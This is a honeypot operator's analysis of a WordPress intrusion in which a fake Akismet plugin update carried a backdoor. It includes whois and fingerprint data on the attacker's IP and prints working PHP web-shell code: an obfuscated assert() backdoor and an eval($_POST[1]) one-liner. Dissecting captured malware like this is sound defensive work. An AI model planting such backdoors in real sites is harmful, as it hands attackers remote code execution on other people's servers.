Broken Akismet plugin replacement with backdoor.
91.200.12.9 has DNS name free.ds
DNS name free.ds has no DNS records.
whois information related to '91.200.12.0/22AS43765'
organisation: ORG-PS152-RIPE
org-name: PP SKS-LUGAN
org-type: LIR
address: Lenina
address: 93400
address: Sev
address: UKRAINE
phone: +380665258035
fax-no: +380665258035
admin-c: TAU-RIPE
abuse-c: AR17440-RIPE
mnt-ref: RIPE-NCC-HM-MNT
mnt-ref: LUGAN-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: LUGAN-MNT
created: 2013-09-25T08:41:49Z
last-modified: 2016-07-11T07:26:07Z
source: RIPE # Filtered
p0f3 say that IP address runs "Windows 7 or 8"
[2018/02/28 20:51:28] mod=syn|cli=91.200.12.9/54499|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=12|params=fuzzy|raw_sig=4:116+12:0:1460:8192,8:mss,nop,ws,nop,nop,sok:df,id+,ecn:0
91.200.12.9 downloaded the backdoor and Akismet replacement via the WordPress Plugin Editor's "update" function. Apparently this lets the WordPress admin send an entire plugin to a real WordPress web site via an HTTP POST parameter.
91.200.12.9 did this after my honey pot decided to allow a login attempt. It does this some small percentage of attempts. 91.200.12.9 got lucky, it only took 20 attempts to get a "valid" login.
- Hand-edit
[email protected]to getakismet.phpandbackdoor.php - Pretty-print
akismet.phpto getf1.php
Whoever formatted the Akismet "update" did an extremely poor job: all the Akismet code got commented out. The Akismet code downloaded is 2.5.9, the version as of 2018-03-05 is 4.0.3.
There's only 6 lines of PHP in the backdoor.
<?php
if(isset($_POST['1w#'])){
$item['ersxf2d'] = strrev('t'./*-/*-*/'r'./*-/*-*/'es'./*-/*-*/'sa');
$array[] = $item;
/*yD4kpPnRwvSTeGH*/
$array[0]['ersxf2d']($_POST['1w#']);exit();}
PHP code arrives in an HTTP POST variable named 1w#. Some mild
obfuscation does not prevent us from seeing that assert()
gets called to execute the code. As of PHP 7.2, assert() no
longer executes strings passed as arguments. I guess blogs that
get updated regularly aren't the intended target of this garbage
malware.
91.200.12.9 tried a number of things against my web site from February 25 to March 3. See access_log for an Apache web server "combined" format list of accesses.
Several of the accesses appear to use some kind of bug, maybe
the "PHP interpreter run as CGI-BIN"
bug of a few years ago.
These accesses seem to create a file webconfig.txt.php
That has a single line of PHP in it: <?php eval($_POST[1]);?>
webconfig.txt.php appears in a number of HTTP accesses of the
web site hosting my WordPress honey pot. But all of the previous
accesses (dating back to 2016-06-10) are attempts to create the
same webconfig.txt.php, or calls to apparently another backdoor,
one that uses HTTP GET parameters named 'z3' and 'z4'.